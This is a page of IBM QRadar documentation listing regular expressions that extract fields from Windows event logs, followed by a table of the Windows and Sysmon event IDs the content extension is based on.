EventID Yes 1 \d{1,2}\s\d{1,2}[:\s]\d{1,2}[:\s]\d{1,2}\s+\d{1,4}\s+(\d+)
EventID Yes 1 EventID=(\d+)
EventID Yes 1 LEEF:[0-9\.]+\|Microsoft\|Windows\|.+\|(\d+)\|

File No 3 (\s|,)\s[Ff]ile:(\s?)(.*?)(,\s|\sowned\sby)
Group Domain No 2 (\s|\t)Group\sDomain:\s*(.*?)(\s\s|\t)
Group Domain No 3 \s(Target|Group)\sDomain:(\s?)(.*?)\s(\s|Target\sAccount\sID:)

Group Name No 2 (\s|\t)Group\sName:\s*(.*?)(\t|\s(\s|Group\sDomain:))
Group Name No 6 \s(Target\sAccount|Computer\sAccount\sThat\sWas\sChanged|Group)((:\s\s(.*?)\s\sAccount)?)\sName:(\s{0,2})(.*?)\s(\s|Target\sDomain|Group\sDomain:)

Group Security ID No 3 (\s|\t)Group:(\s+|\t)Security\sID:\s*(.*?)(\s\s|\t)
Group Security ID No 3 \s((Target\sAccount|Computer\sAccount\sThat\sWas\sChanged|Group):\s{1,3}Security|Target\sAccount)\sID:\s{0,2}(.*?)\s(|\s|Caller\sUser\sName:)

GroupID Yes 1 Group ID: (\d+)
Home Directory No 2 \s\sHome\sDirectory:(\s{1,2})(.*?)\s\s
Logon Type No 1 \sLogon\sType:\s+(\d+)(\s|$)
Member Account Name No 5 (\s|\t)Member(:(\s+?|\t).*?(\s+?|\t)Account)?\sName:\s*(.*?)(\t|\s+?(Group|Member\sID):)
Member Security ID No 4 (\s|\t)Member(:(\s+?|\t)Security)?\sID:\s*(.*?)(\t|(\s+?(Target\s)?Account\sName:))
Message No 10 (\t[Mm]essage=|\s\d{1,2}[:\s]\d{1,2}[:\s]\d{1,2}\s+\d{1,4}\s+(\d+)\t(.*?)\t(.*?)\t(.*?)\t(.*?)\t(.*?)\t(.*?)\t(\t?))(.+)
New Account Domain No 6 \s\sNew\sAccount((\sName)?):\s(.*?)\s\s(Account|New)\sDomain:(\s{1,2})(.*?)\s\s
New Account Name No 5 \s\sNew\sAccount((:\s\s(.*?)\s\sAccount)?)\sName:(\s{1,2})(.*?)\s\s
New Account Security ID No 2 \s\sNew\sAccount(:\s{2,3}Security)?\sID:\s{1,2}(.*?)\s\s
New Logon Account Domain No 3 \s\sNew\sLogon:\s\s(.*?)\s\sAccount\sDomain:(\s{1,2})(.*?)\s\s
New Logon Account Name No 3 \s\sNew\sLogon:\s\s(.*?)\s\sAccount\sName:(\s{1,2})(.*?)\s\s
New Logon Security ID No 3 \s\sNew\sLogon:(\s{2,3})Security\sID:(\s{1,2})(.*?)\s\s
New Process Image File Name No 3 \s\s(New\sProcess\sInformation|A\snew\sprocess\shas\sbeen\screated):\s\s(.*?)\s\sImage\sFile\sName:\s(.*?)\s\s
New Process Name No 2 \sNew\sProcess\sName:(\s?)(.*?)\s(\s|Token\sElevation\sType:)
New Token Account Domain No 2 \s\sNew\sToken\sInformation:\s\s(.*?)\s\sAccount\sDomain:\s\s(.*?)\s\s
New Token Account Name No 2 \s\sNew\sToken\sInformation:\s\s(.*?)\s\sAccount\sName:\s\s(.*?)\s\s
New Token Security ID No 1 \s\sNew\sToken\sInformation:\s\sSecurity\sID:\s\s(.*?)\s\s
ObjectName Yes 1 Object Name: (.*?)
ObjectName Yes 1 New Process Name: (.*?)

ObjectType Yes 1 Object\sType:\s{0,2}(.*?)\s+(Object\sName|Process\sID|Source\sAddress):
Primary Domain No 2 \s\sPrimary\sDomain:(\s{0,2})(.*?)\s\s
Primary User Name No 2 \s\sPrimary\sUser\sName:(\s?)(.*?)\s\s
Process Name No 2 \s\sProcess\sName:\s(\s?)(.*?)(\s\s|$)
Realm Yes 1 Supplied Realm Name: (.*?)[ ]
Record Number No 1 \tRecordNumber=(.*?)\t
SAM Account Name No 2 \sS(AM|am)\sAccount\sName:\s?(.*?)\s(\s|SID\sHistory:)
Scope Yes 1 Scope:\s(.*?)\s+(\d+|$)
Secondary User Name No 1 \tSecondaryUserName=(.*?)\t
Service Name No 5 \s(\s|Service\sInformation:\s)(Service\sName|Server:\s\s(.*?)\s\sService):(\s{0,2})(.*?)\s(\s|Server:|Service\sFile\sName:)
Share Name No 2 \sShare\sName:(\s{0,2})(.*?)\s(\s|Share\sPath:)
Source Workstation Yes 6 (\sSource\sWorkstation|The\slogon\sto\saccount:\s(.*?)\sby:\s(.*?)\sfrom\sworkstation|(\s|Authentication\sPackage:\s(.*?))\sWorkstation\sName|Caller\sWorkstation):\s(.*?)\s(\s|Caller\sUser\sName:|Error\sCode:)
Subject Account Domain No 5 (\s\s|\t)Subject(\s?):\s(.*?)\sAccount\sDomain:(\s{0,2})(.*?)\s(\s|Logon\sID:)
Subject Account Name No 5 (\s\s|\t)Subject(\s?):\s(.*?)\sAccount\sName:(\s{0,2})(.*?)\s(\s|Account\sDomain:)
Subject Security ID No 5 (\s\s|\t)Subject(\s?):(\s{1,3})Security\sID:(\s{0,2})(.*?)\s(\s|Account\sName:)
Target Account Domain No 3 \s\s(Target\sAccount|Computer\sAccount\sThat\sWas\sChanged):\s\s(.*?)\s\sAccount\sDomain:\s{0,2}(.*?)(\s\s|\s$|\t)
Target Account Name No 6 \s(Target\sAccount|Computer\sAccount\sThat\sWas\sChanged)((:\s\s(.*?)\s\sAccount)?)\sName:(\s{0,2})(.*?)\s(\s|Target\sDomain:)
Target Account Security ID No 3 \s((Target\sAccount|Computer\sAccount\sThat\sWas\sChanged):\s{2,3}Security|Target\sAccount)\sID:\s{0,2}(.*?)\s(\s|Caller\sUser\sName:)
Target Account Security ID No 2 (Assigned\sTo|Removed\sFrom):\s*(.*?)\s+?(Assigned|Removed)\sBy:

Target Domain No 2 \sTarget\sDomain:(\s?)(.*?)\s(\s|Target\sAccount\sID:)
Target Process Name No 1 \s\sTarget\sProcess\sName:\s(.*?)\s\s
Target User Name No 1 \s\sTarget\sUser\sName:\s(.*?)\s\s
User Account No 1 \sUser\saccount:\s(.*?)\sUser\sdomain:
User Domain No 2 \sUser\s[Dd]omain:(\s{1,2})(.*?)\s(\s|\w+:)
User Name No 3 (\s|:)\sUser\s[Nn]ame:(\s?)(.*?)\s(\s|\w+:)
User Principal Name No 1 \s\sUser\sPrincipal\sName:\s(.*?)\s\s
User Right No 1 User\sRight:\s*(.*?)\s+?(Assigned\sTo|Removed\sFrom|$):
User Workstations No 1 \s\sUser\sWorkstations:\s(.*?)\s\s

(Back to top)

The following table shows the event IDs and event names on which the custom event properties in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension are based.

Table 24. Event IDs in IBM Security QRadar Custom Properties for Microsoft Windows Content Extension 1.2.1
Event ID Event Name
1 Process Create
2 A process changed a file creation time
3 Network connection detected
5 Process terminated
7 Image loaded
8 Create RemoteThread
10 ProcessAccess
11 FileCreate
13 Registry Event (Value Set)
15 FileCreateStreamHash
22 DNS Query
23 File Delete
513 Success Audit: A user account was created
537 Logon failure - The Logon attempt failed for other reasons
627 Success Audit: Change Password Attempt Succeeded
631 Group Created
632 Global Group Member Added
634 Group Deleted
636 Local Group Member Added
637 Local Group Member Removed
850 Windows Firewall Configuration
4103 Module Logging Command Invocation
4104 Script Block Executed/Compiled
4624 Success Audit: An account was successfully logged on
4625 Failure Audit: An account failed to log on
4648 Success Audit: A logon was successful using explicit credentials
4656 Failure Audit: A handle to an object was requested
4657 Success Audit: A registry value was modified
4662 Success Audit: An operation was performed on an object
4663 Success Audit: An attempt was made to access an object
4670 Success Audit: Permissions on an object were changed
4688 Success Audit: A new process has been created
4689 Success Audit: A process has exited
4696 Success Audit: A primary token was assigned to process
4698 Success Audit: A scheduled task was created
4702 Success Audit: A scheduled task was updated
4720 Success Audit: A user account was created
4723 Success Audit: An attempt was made to change an account's password
4725 Success Audit: A user account was disabled
4726 A user account was deleted
4727 Success Audit: A security-enabled global group was created
4728 Success Audit: A member was added to a security-enabled global group
4729 Success Audit: A member was removed from a security-enabled global group
4730 Success Audit: A security-enabled global group was deleted
4732 Success Audit: A member was added to a security-enabled local group
4733 Success Audit: A member was removed from a security-enabled local group
4735 Success Audit: A security-enabled local group was changed
4737 Success Audit: A security-enabled global group was changed
4738 Success Audit: A user account was changed
4740 Success Audit: A user account was locked out
4741 Success Audit: A computer account was created
4742 Success Audit: A computer account was changed
4743 Success Audit: A computer account was deleted
4754 Success Audit: A security-enabled universal group was created
4755 Success Audit: A security-enabled universal group was changed
4756 Success Audit: A member was added to a security-enabled universal group
4761 Success Audit: A member was added to a security-disabled universal group
4762 Success Audit: A member was removed from a security-disabled universal group
4767 Success Audit: A user account was unlocked
4768 Success Audit: A Kerberos authentication ticket (TGT) was requested
4769 Failure Audit: A Kerberos service ticket was rejected
5140 A network share object was accessed
5142 Network Share Object Added
5145 Success Audit: Network Share Object Checked for Access

(Back to top)